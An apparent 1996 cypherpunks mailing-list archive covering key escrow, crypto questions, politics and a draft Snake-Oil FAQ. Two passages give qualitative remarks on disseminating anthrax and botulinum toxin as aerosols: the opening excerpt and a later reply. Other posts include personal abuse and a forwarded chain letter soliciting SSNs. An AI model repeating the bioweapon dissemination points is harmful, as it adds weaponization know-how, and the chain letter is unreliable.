MINIMUM NEED TO WEAR A PROTECTIVE OVERGARMENT A CHEMICAL AND

BIOLOGICAL WARFARE MASK, AND UNDERGO THOROUGH DECONTAMINATION 
AFTER
DISPENSING THE AGENT(S) . DECONTAMINATION OF THE AEROSOL 
GENERATORS AND
TRANSPORT VEHICLES WOULD LIKELY HAVE TO ACCUR NEAR 
THE AREA OF OPERATION
AT REMOTE LOCATIONS SO AS TO MININIZE 
INCIDENTAL CONTAMINATION OF IRAQI
FORCES.


3.  THE IRAQIS HAVE TWO CONFIRMED BW AGENTS--ANTHRAX AND BOTULINUM 
TOXIN.
ANTHRAX CAN BE4 DISSEMINATED BY AEROSOL GENRATORS EITHER 
AS A FREEZE-DRIED
POWDER OR AS A LIQUID SUSPENSION.  THEORETICALLY 
BOTULINIUM TOXIN CAN BE
DISPENSED AS EITHER A FREZE-DRIED POWDER, 
PROBABLY IN COMBINATION WITH A
FILLER, OR AS A LIQUID.  THE MORE 
LIKELY OF THE TWO CHOICES FOR BOTULINUM
TOXIN IS DISSEMINATION AS 
A POWDER.  POWDERS ARE EASILY MIXED WITH
FILLERS, POSE A 
CONSIDERABLY GREATER THREAT THROUGH INHALATION, AND ARE
BETTER 
ABLE TO WITHSTAND THE SHEAR FORCES EXPERIENCED WHEN DISSEMINATED

THROUGH NOZZLES WITH A RELATIVELY SMALL ORIFICE.  
 



 

 






PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Wed, 18 Sep 1996 18:06:06 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: The GAK Momentum is Building...
Message-ID: <v02130500ae64db545142@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 17 Sep 1996 21:02:03 -0700, Lucky Green wrote:
>>On Tue, 17 Sep 1996, Timothy C. May wrote:
>> However, making the government a _required_ part of such plans implies a
>> motive that is not at all the same as what companies wish (mostly, disaster
>> recovery).
>
>The required part will come later. Meanwhile, many big players in the
>industry are volunteering to include GAK for you.

It seems that in order for this to work Net consumers must be
convinced/coerced into accepting the GAK security features.  What if, due
to a grassroots uprising, Neters refuse to use products which require GAK
or Net services which will only operate via GAK?  Isn't there an great
opportunity being created for S/Wan, Apache and its ilk and third-party
(especially off-shore, non-COCOM, produced) security plug-ins?

>
>When I asked the fellow from HP that proposed the CommerceNet position
>paper how the "voluntary key recovery" he was proposing on his slides
>could possibly aid law enforcement against criminals who obviously
>wouldn't "escrow" their keys, he said, and I am not kidding:
>
>"There are many possible interpretations of the words voluntary and
>mandatory." I was the *only* person in a room full of people working in the
>industry that seemed bothered by this.
>
>> Furthermore, the main worry (for me, at least) is that the government hopes
>> to get its Clipper IV scheme accepted (by means of export laws) at some
>> large fraction of important corporate accounts, not the least of which will
>> be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players
>> in the "infrastructure" business. Once most of these have "bought off" on
>> GAK, pressure will be intense to universalize the process, to make it a
>> felony _not_ to use a "Key Authority."
>
>That's exactly how it will be.

Enacting laws which make criminals out otherwise upstanding citizens is the
surest path to civil disobedience/unrest, disrespect for duly constituted
government and more serious criminal behavior.  I guess I and many friends
will be on posters in the Post Office.

-- Steve


PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 18 Sep 1996 18:33:01 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <v02130500ae64db545142@[10.0.2.15]>
Message-ID: <Pine.3.89.9609180033.A7300-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 18 Sep 1996, Steve Schear wrote:
> It seems that in order for this to work Net consumers must be
> convinced/coerced into accepting the GAK security features.  What if, due
> to a grassroots uprising, Neters refuse to use products which require GAK
> or Net services which will only operate via GAK?  Isn't there an great
> opportunity being created for S/Wan, Apache and its ilk and third-party
> (especially off-shore, non-COCOM, produced) security plug-ins?

Simple. Incentivize sites/server/payment system manufacturers to require 
certs from their users. This is already underway. See SET. Then make sure 
that the certs/keys are GAK'ed. Yes, I know there is a difference between 
certs and keys. Joe User doesn't. Neither does the media. It is a two step 
process.

> Enacting laws which make criminals out otherwise upstanding citizens is the
> surest path to civil disobedience/unrest, disrespect for duly constituted
> government and more serious criminal behavior.  I guess I and many friends
> will be on posters in the Post Office.

Those of us that won't have "reformed", have been shot, or imprisoned, 
will indeed be on the posters in the Post Office. And the banners on all 
major websites.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 18 Sep 1996 19:12:40 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
In-Reply-To: <v02130503ae644adb01ad@[10.0.2.15]>
Message-ID: <Pine.SUN.3.94.960918010023.5150A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996, Steve Schear wrote:

> >On Mon, 16 Sep 1996, Steve Schear wrote:
> >
> >> Someone wrote:
> >
> >> >The problem is that assasination rarely leads to the installation of
> >> >a government that is any better. In most cases it gets worse.
> >
> >[...]
> >
> >> We've all heard these arguments, but are they true?  Who says so, and how
> >> can they be certain? Jim's suggestion has never, to my knowledge, been
> >> tried on a consistant, large, scale.  When all conventional alternatives
> >> have been tried and fail, what have we or the starving children got to
> >> lose?
> >
> >I think "Lord of the Flies" answers this question quite well.
> 
> Does it?  LOTF was fiction.  Can you identify a recent instance in which a
> non-governmental organization attempted to influence political/military
> events via a concerted AP?

Try every violent insurgent movement in the modern era.  The only
difference is the manner of target selection included no money.

> >> Is it legal for citizens of the U.S. to engage in contract killing of
> >> foreign military, politations, etc?  How about U.S. or foreign non-profits?
> >
> >As to the first, yes.  (There are several anti-mercenary statutes on the
> >books)  As to the second, I don't understand the question.
> >
> So, you're saying it is legal for citizens?

Excuse me?

No, I am saying that U.S. citizens will be breaking the law if they move
to overthrow foreign governments, even in private action.

This is called, among other names, an anti-mercenary statute.

> The second question was whether a non-profit org. could raise
> tax-deductible funds to conduct such operations.

Done every day.  As to the legality, it would clearly be criminal
conspiracy to raise funds in furtherance of an attempt to violate
anti-mercenary statutes.


--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 18 Sep 1996 17:14:28 +0800
To: jbugden@smtplink.alis.ca
Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Politica...
In-Reply-To: <9608178430.AA843010044@smtplink.alis.ca>
Message-ID: <Pine.SUN.3.94.960918010631.5150B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996 jbugden@smtplink.alis.ca wrote:

> Black Unicorn <unicorn@schloss.li> wrote:
> >On Tue, 17 Sep 1996 jbugden@smtplink.alis.ca wrote:
> >> Black Unicorn <unicorn@schloss.li>
> >> >You are saying that everyone on the planet has a right to health
> >> > insurance and disability insurance whether they can afford it or not.
> >> > This is folly.  The result is serious moral hazard problems.
> >> 
> >> Almost, but not quite. I'm saying that within our two countries at least
> >> (Canada, U.S.) everyone could have access to medically necessary
> >> procedures because the *society as a whole* can afford it.
> >
> >The decisions about what is or is not medically necessary must by
> >design be made by government in a socialized medicine regime.
> 
> People do make decisions that affect other people. If you feel safer in the good
> hands of Allstate than at the government trough, good for you.

I feel safer in the hands of the market where Allstate is but one
insurance carrier.

> Personally, I trust in Allah, but I still tie up my camel. 
> 
> > This evades an important point as well.  Namely, who cares if society
> > can afford it?
> 
> Some things are seen as investments in the future of a society. I view both
> Education and Health through this lens.

I'd like to hear the argument for Health.
I'd like to hear the argument for Education- particularly one which makes
socialized education systems the only, or even a good answer.

> >> But there is a balance between accurately pricing the risk and
> >> minimizing the cost of the bureacracy that polices this pricing. 
> >
> > Oh, I see.  Let's give the program to the government then.  Good idea.
> > That will reduce the cost of the bureacracy.
> 
> The point is still valid. Are we not trying to minimize this cost?

Now explain how government will reduce bureacracy and minimize cost
please.  Cite, if you will, a few examples.

> >> There are also many ways to modify behaviour, not all of them direct. 
> >
> > And all of them buy into the notion that people are not to be made
> > personally responsible for their high risk behavior.
> 
> There it is again. Blame the sick for their lack of moral fibre.

Blame the rich for their condition.
 
> Not every victim of lung cancer smokes.

I'll tell you what.  I will give you a dollar for every non-smoking
related lung cancer case, if you give me one for every smoking related
case.

> Besides, people are notoriously poor at
> evaluating the probability of unlikely events (see reference below). A
> "punishment" that happens 30 years after the "crime" is no deterrent.
> Prevention is usually cheaper than treatment. 

And now please describe how government and socialized medicine are better
at preventing lung cancer.

> > I prefer market solutions.
> 
> I prefer solutions.

Now please explain how government provides a superior solution.

> James

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 18 Sep 1996 19:27:52 +0800
To: Krenn <krenn@nym.alias.net>
Subject: Re: Snake-Oil FAQ
In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu>
Message-ID: <323FAF89.651F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Krenn wrote:
> It would be nice to have a list of actual products which are deemed
> potential snake-oil. Such a list could be maintained anonymously
> through a nym to avoid all the annoying legal problems with commenting
> on another's product. Though truth is the best defense against libel
> charges, it would be very annoying to be sued or some such by some
> hairbrained snake-oil peddler.

Think how much more annoying it would be if the shoe were on the other 
foot.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Wed, 18 Sep 1996 19:58:15 +0800
To: cypherpunks@toad.com
Subject: Re: Redundancy in XOR encryption
Message-ID: <323F94D1.EC0@metronet.com>
MIME-Version: 1.0
Content-Type: message/rfc822


To: <bdurham@metronet.com>
Subject: Undeliverable Message
From: <MAILER-DAEMON@mqg-smtp3.usmc.mil>
Date: Tue, 17 Sep 96 7:15:44 -24000

To:            <paul@fatmans.demon.co.uk>,<cypherpunks@toad.com>
Cc:            
Subject:       Re: Redundancy in XOR encryption

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER


VNM3043 -- MAILBOX IS FULL

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
    The maximum message limit for a user's mailbox is 
   10,000.  The default message limit is 1000 messages.  
   Administrators can set message limits using the 
   Mailbox  Settings function available in the 
   Manage User menu  (MUSER). 

   When a user's mailbox reaches the limit, the 
   user must delete some of the messages before 
   the mailbox can accept any more incoming messages.

UNDEFINEDpaul@fatmans.demon.co.uk wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I have a question I hope someone here might be able to answer:
> 
> As the method of cryptanalysis of XOR (Ie. index of coincidence)
> relies on redundancy in the plaintext, would the following be strong:
> 
> Compress P to get perfect compression (ie. 0 redundancy)
> Encrypt F (the compressed text) using a repeated key XOR
> 
> of course this is all rather theoretical as there is no such thing as
> perfect compression, but I just thought it might be interesting to
> see if this is indeed strong, superficially it appears so to me...
> 

Paul:
   I think that if the cryptanalyst knows that F has zero redundancy
that he can run searches from 0 to n bits for the key and have
the computer flag solutions that have zero redundancy.  

   I also think that a perfectly compressed file would have a relative
entropy value close to one also, hence the computer could flag possibles 
that have both characteristics.

   Hence, instead of searching for plaintext by counting coincidences,
we are searching the decrypts for solutions that have zero redundancy
and a relative entropy value close to one.  How many solutions will
have both these qualities?  I don't know.  But if the compression method 
is known, brute force will be tried, and only having to try to 
decompress (read) data that has the resultant characteristics
of compressed information will speed things up by quite a bit.

   Others may disagree with my thought-experiment and my approach,
but I think this is quite possible ... even to persons with limited
computing resources.

   Brian Durham
   bdurham@metronet.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 18 Sep 1996 17:23:30 +0800
To: Adamsc <Adamsc@io-online.com>
Subject: Re: Fear of Flying -- from HotWired
In-Reply-To: <19960917173431968.AAA223@IO-ONLINE.COM>
Message-ID: <Pine.SUN.3.94.960918011600.5150C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996, Adamsc wrote:

> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote:
> 
> >>... former CIA director James Woolsey: responded with some seemingly 
> >>   gratuitous anti-Net
> >>   rhetoric. Terrorists may use biological weapons like anthrax, he said.
> >>   "Anthrax is colorless, odorless, and has a 90 percent lethality. One
> >>   gram has 100 million lethal doses." Then Woolsey delivered the zinger:
> >>   "The knowledge of how to make anthrax is widely available, including
> >>   on the Internet."
> 
> >Gee, biotech has come a long way.  Now I can download the Anthrax DNA
> >sequence from the net and insert it in some carrier bacteria and start
> >making Anthrax bacteria.  Neat!

Culturing and growing anthrax is painfully simple.  No DNA required.

> >BTW - My dictionary says that Anthrax is primarily an animal disease which
> >only occasionally infects humans.  It sounds like a poor choice for bio-war
> >terror.

Incorrect.  It is highly problematic and very nasty when it is properly
delivered.  The hardest thing about anthrax is to get an areosol fine
enough to present an inhalation risk.  (This is why it does not
generally cause problems in humans- it's rare for it to get this fine).

> Unfortunately, it can be very deadly.  The idea here is that it rarely infects
> humans - in the normal course of events.  If a determined biowarrior is trying
> to infect people, all bets are off.

Exactly.

> 
> # Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
> # cadams@acucobol.com | V.M. (619)515-4894

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 18 Sep 1996 02:53:08 +0800
To: craigw@dg.ce.com.au
Subject: Re: Risk v. Charity (was: RE: Workers Paradise. /Political rant
In-Reply-To: <199609170703.RAA21552@mac.ce.com.au>
Message-ID: <199609171531.BAA22478@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> And what am I paying for...to protect the status quo. I believe that 
> there is more than enough help for ppl available. They just need to 
> get off their butts and work.

Do we really need your amatuer political views?

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SpyKing <SpyKing@thecodex.com>
Date: Wed, 18 Sep 1996 19:30:20 +0800
To: (Recipient list suppressed)
Subject: Codex Sample
Message-ID: <9609180621.AA09327@plato.mne.com>
MIME-Version: 1.0
Content-Type: text/plain


Attached...
This communication is copyrighted by the author. 1996, All Rights Reserved. 
Interception, forwarding, posting/re-posting of all /or any part of of this
message is a violation of U.S. Copyright laws and may result in civil or
criminal action against violators. 
The Codex Surveillance & Privacy Newsletter - http://www.thecodex.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 18 Sep 1996 22:14:48 +0800
To: cypherpunks@toad.com
Subject: Re: The GAK Momentum is Building...
Message-ID: <3.0b19.32.19960918032950.007163ac@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



>>However, making the government a _required_ part of such plans implies a
>>motive that is not at all the same as what companies wish (mostly,
>>disaster recovery).
>
>the distinction lies in the terminology. what does it mean, "required
>part of the plan". if it essentially amounts to nothing more than 
>the government saying, "you must give us keys when we present you
>with a subpoena/warrant", then that's no different than the system
>we have today.

Hmm. The government sure is putting a lot of effort into moving us to a
system that you say is "no different than the system we have today." As far
as I can tell, you're the only one who thinks that. The government thinks
that GAK is a big change, civil libertarians think GAK is a big change ..
but you're welcome to call it "status quo" if it suits you. 

There's a world of difference between the government subpoena-ing something
from me, where I can delay disclosure until I've exhausted my legal avenues
to challenge disclosure, and the government demanding data from an at best
disinterested third party who cares not at all if I get my day in court
before they disclose. With the second scenario, I'm forced to try to
"unring the bell", and somehow limit the spread of otherwise
private/confidential data in a community (law enforcement) which is
organized to collect and retain information. Ha, ha. Given today's Congress
and Supreme Court, there's probably precious little chance that keys
disclosed prematurely or erroneously won't be used to collect evidence
which will be admissible despite the lack of meaningful opportunity to
challenge the "recovery" of a key.

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 18 Sep 1996 21:26:30 +0800
To: cypherpunks@toad.com
Subject: Eudora 3.0 supports multiple tentacles
Message-ID: <3.0b19.32.19960918034112.006e3598@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



Those of you who have or are tentacles (hee, hee) might take a look at the
new Eudora 3.0 beta; it's got nice built-in support for multiple POP
mailboxes/usernames, and keeps track of which identity received a messages,
and sends replies from that identity (using the appropriate outbound SMTP
server) so as not to confuse correspondents. It seems to be ideally set up
for people who want to adopt an alternate nym for whatever reason. The
filtering is also allegedly improved but I haven't fussed with that much yet.


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Wed, 18 Sep 1996 19:48:30 +0800
To: cypherpunks@toad.com
Subject: Re: Quantum Computers
Message-ID: <3.0b16.32.19960918050947.00539aa0@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


I rather enjoyed this article, especially the part about:

>It gets even wilder, because the quantum mechanical state of the
>matter in the machine's memory determines the output, Seth Lloyd 
>of MIT thinks you could run the machine in  reverse and the result 
>would be a quantum mechanical micromanipulator.

This was great!  So where do we plug in the nice hot cup of tea? ;^)

I'm sorry if I seem to be making light of a very serious topic, but, last
time I checked, computers don't have a reverse.  Spam me, flame me,
whatever, but as far as I know, the universe only goes in one direction.
It's just a rehash of the old sci-fi dramas about building a computer that
goes on and builds a smarter computer, ad infinitum.  That's one of the
problems of non-sentient things: they can't grasp anything beyond their
scope.  But, for argument's sake, let's assume:

1. This quantum computer, which looks startlingly like my HP48, has a
slider labeled:
  FORWARD -- STOP -- REVERSE
   And the slider actually works.
2. We are working with a finite-state quantum computer (say 32 qbits worth).
3. There is NO error introduced into the system from any source, including
itself.

Okay, so I turn my little QC48 on, just to set a state, and then slam the
slider into REVERSE.  AT this point, it fizzles and dies.  Why?  Because of
the same reason you can't just put the DES algorithm 'in reverse': the
quantum equivalent of s/p-boxes.

What am I talking about?  I'm talking about a QUANTUM COMPUTER here.
Remember it's greatest asset?  It does every calculation at once.  This is
exactly why you can't go backwards.  You have nowhere to go, because you
have EVERYWHERE to go.  Because at each 'quantum tick' of the 'quantum
clock' EVERY possible operation is going on, each state has the possibility
of leading to every other state.

Now, let's throw out assumption #3, and deal with a slightly more realistic
version of my QC48, the QC48SX.

Because we're dealing with a computer that produces error in it's own
system, the error is going to be relatively hard to keep track of.  Notice
that the error-correction schemes listed don't eliminate error, they just
help thin it out.  So you've got your result to the operation you just
performed:
  OP1 + OP2 + OPERR = RESULT
The error-correction protocol makes OPERR small, but it doesn't eliminate
it.  So this is when I throw it into reverse.  (Sure, I could have kept
track of all my operations up to that point and trace back along them with
no problem, but I can only do that until the point at which I turned on my
QC48SX, so let's just assume I didn't keep track.)  I've got RESULT now,
and with a reasonable degree of accuracy, I can statistically figure out
what two states led up to that point, with a margin of error STATERR.  This
is made even tougher by the fact that there was an error (OPERR) in the
system to begin with.  Remember now, every state can lead to every other
state, but let's assume we've got NSA-level statisticians here, and STATERR
is relatively small.  You now have STATERR*OPERR working against you.  This
is where working in a finite-state machine is good, as it keeps these
values relatively small.  But they are still there.  These errors, in
combination with the quantum-s/p-box factor, precludes you from going
backwards with any degree of reliability.

Like I said, I'm not trying to tear down anyone hopes and ideas, I just
want to introduce a little *reality* into our system.


____________________________________________________________
Rick Osborne                     osborne@gateway.grumman.com
"Yes, evil comes in many forms, whether it be a man-eating
 cow or Joseph Stalin, but you can't let the package hide
 the pudding!  Evil is just plain bad!  You don't cotton to
 it.  You gotta smack it in the nose with the rolled-up
 newspaper of goodness!  Bad dog!  Bad dog!" - The Tick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 18 Sep 1996 15:38:56 +0800
To: remailer@mailhub.bart.nl
Subject: A daily warning regarding Timothy C. May
Message-ID: <199609180341.FAA02454@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May is a lying sack of shit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 23:47:12 +0800
To: cypherpunks@toad.com
Subject: Re: A Bizarre Increase in the Ad Hominems Here
In-Reply-To: <ae64c08c0b02100457ec@[207.167.93.63]>
Message-ID: <TZ0FuD105w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timmy May) (fart) writes:
> * Detweiler (vznuri@netcom.com) writes:

Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy
believes his own lies.

> (Sadly, a large fraction of the women who have posted on our list have
> written in this same kind of incoherent, rambling, makes-no-sense kind of
> style. I have no idea why the percentage of such events is so high.)

Is Timmy gay?  Why does he hate women so much?

> * And of course Vulis has been posting his "farting" messages far and wide.

Recently, 3 people in the computer security field have independently
told me that Timmy May approached them "off-list" to complain about
things I supposedly say on the Internet - most of which I never said.
When I asked about it on this mailing list, Timmy posted what was shown
to be a lie (about his complaint to Kelly Goen.) Timmy is known as a
nutcase and a liar - if he keeps up his "character assassination"
attacks, the only reputation he hurts is his own.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 18 Sep 1996 23:36:55 +0800
To: cypherpunks@toad.com
Subject: SSN database scam?
Message-ID: <323FDB5E.500F9F30@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain

Forwarded from www-security mailing list.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06


To: www-security@ns2.rutgers.edu
Subject: Can you say "fraud"? (fwd)
From: Mary Irene Wise <auntyem@umich.edu>
Date: Tue, 17 Sep 1996 08:44:39 -0400 (EDT)
Sender: owner-www-security@ns2.rutgers.edu

This is probably a bit off-topic; if so I apologize.

Can anybody comment on the item forwarded below my sig file? It claims
there's a database w/ people's credit card no's etc on it and you have to
give your name and social security number to get off of it.  This strikes
me as being a scam to get your ssn, but this went around at work and
people are actually calling and giving it out.  I know ssn's aren't really
as secure as they're supposed to be, but  still...

So, does anybody know if this database is for real or if it's just a scam?

TIA,
Mary Wise

--------------------------------- *** ------------------------------------
Mary Wise			   |
Computer Systems Specialist	   *	auntyem@umich.edu
LSA Information Technology	   |	homepage not availabe at this time
3557 LSA Bldg 1382		   *
University of Michigan		   |
(313) 647-6230			   *
				   |
--------------------------------- *** ------------------------------------


---------- Forwarded message ----------
>
>
> Your name, social security number, current address, previous addresses,
> mother's maiden name, birth date and other personal information
> are now available to anyone with a credit card through a new Lexis database
> called P-Trax. As I am sure you are aware, this information
> could be used to commit credit card fraud or otherwise allow someone else to
> use your identity.
>  
> You can have your name and information removed from this list by making a
> telephone request. Call (800)543-6862, select option 4 and
> then option 3 ("all other questions") and tell the representative answering
> that you wish to remove your name from the P-trax database. You
> may also send a fax to (513) 865-7360 or 865-1930. Include your full name and 
>ssn in the fax. You can also send physical mail to 
>
> LEXIS-NEXIS 
> P.O. Box 933
> Dayton, Ohio 45401-0933. 
>
> Sending physical mail to confirm your name has been removed is always
> a good idea.
> 
> As word of the existence of this database has spread on the net, Lexis-Nexis
> has been inundated with calls, and has set up a special set of
> operators to handle the volume. In addition, Andrew Bleh (rhymes with
> "Play") is a manager responsible for this product, and is the person
> to whom complaints about the service could be directed. He can be reached at
> the above 800 number. Ask for extension 3385. According to
> Lexis, the manager responsible is Bill Fister at extension 1364.
>  
> I called this morning and had my name removed. The representative will
> need your name and social security number to remove you from the list.
> I suggest that we inundate these people with requests to remove our
> info from the list and forward this e-mail to everyone we know.
>
>
>----- End Included Message -----
>
>
>
>Cheers . . . 
>
>"The backup procedure works fine, but the restore is tricky!"
>_____________________________________________________________________________
> |   _  \  Amanul Haque
> |  | \  \   Pencom System Administration  
> |  |_/__/__ __  9050 Capital of Texas Highway North, Austin, TX 78759
> |   _/ ___/|  \                           Email: ahaque@pencom.com
> |  | \___ \| \ \                          Pager: (708) 643-7331
> |__| /____/|_|__\___________________________________________________________
>           Pencom Web Page : http://www.pencom.com
>
>
>
>------------- End Forwarded Message -------------
>
>
>
>
>


                    -=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-

                              Nancy L. Cassidy
	                   University of Michigan
                         LS&A Budget & Finance Team

                             2557 LSA Bldg. 1382
                             Tel: (313) 764-6465
                             Fax: (313) 764-2697

                     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 18 Sep 1996 20:13:14 +0800
To: Thomas Dell <tdell@netscape.com>
Subject: Re: Wealth Tax vs. Capital Gains Tax Reduction
In-Reply-To: <323F13CA.7523@netscape.com>
Message-ID: <Pine.WNT.3.95.960918163339.-995979u-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


Such kind of wealth tax would likely trigger a major sell-off of stocks,
both because holding them would no longer defer taxation, and also for
raising the liquidity necessary to pay the tax. That could potentially
cause a stockmarket crash, and upset a lot of electors. I hope that U.S.
Congress and government be aware of that.

Enzo

On Tue, 17 Sep 1996, Thomas Dell wrote:

> > Needless to say, I despise the idea of a "wealth tax," and I can
> > see various loopholes and workarounds. I'd also expect a lot of
> > folks to simply move out of the country if this were to happen.
> 
> Not without difficulty. While this is not from a reliable source,
> it does seem that the gov't is aware of this issue.
> 
> Tom
> 
> tdell@netscape.com
[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 19 Sep 1996 09:06:13 +0800
To: "'cmcurtin@research.megasoft.com>
Subject: Snakeoil FAQ edits/comments
Message-ID: <01BBA534.F29A46E0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt:

Thanks, and good work.
My comments are indicated by [your text] in brackets, my comments >>> set 
off by >>>'s.
To help separate, look for "-----------------------------"

--------------------------- snake-oil-faq ----------------------------

                           Snake-Oil Warning Signs
                        Encryption Software to Avoid
      $Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $
Distribution

Please do not distribute this beyond the circles of cryptographic 
competence
yet. This is an incomplete work-in-progress. Feedback is greatly
appreciated.

The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt,
alt.security, comp.security, and comp.infosystems. We're targeting those 
who
have influence over or direct involvement in the purchasing decisions of
computer security software and equipment in the corporate and academic
worlds, as well as individual users who wish to assert their privacy 
through
the use of good cryptography.

-----------------------------
>>> I wonder what a good assumption is about level-of-expertise.
I should think rather low, since a more experienced person will
not be in as much need of the doc in the first place.  Think 
moderately-informed user:
like the readers of InfoWorld, eh?  Given that, there are several places 
where
knowledge of the subject is assumed that the real consumer of the FAQ 
doesn't have.
-----------------------------


Disclaimer

All contributors' employers will no doubt disown any statements herein.
We're not speaking for anyone but ourselves, based on our own experiences,
etc., etc., etc. This is a general guideline, and as such, cannot be the
sole metric by which a security product is rated, since there can be
exceptions to any of these rules.

-----------------------------
>>> Actually, I think there are some rules in here that there are no 
exceptions to.
Check; nothing comes immediately to mind tho.
-----------------------------



-----------------------------
[(But if you're looking at something that sounds familiar on several of the 
'things to watch out for,' you're probably dealing with snake oil. ]
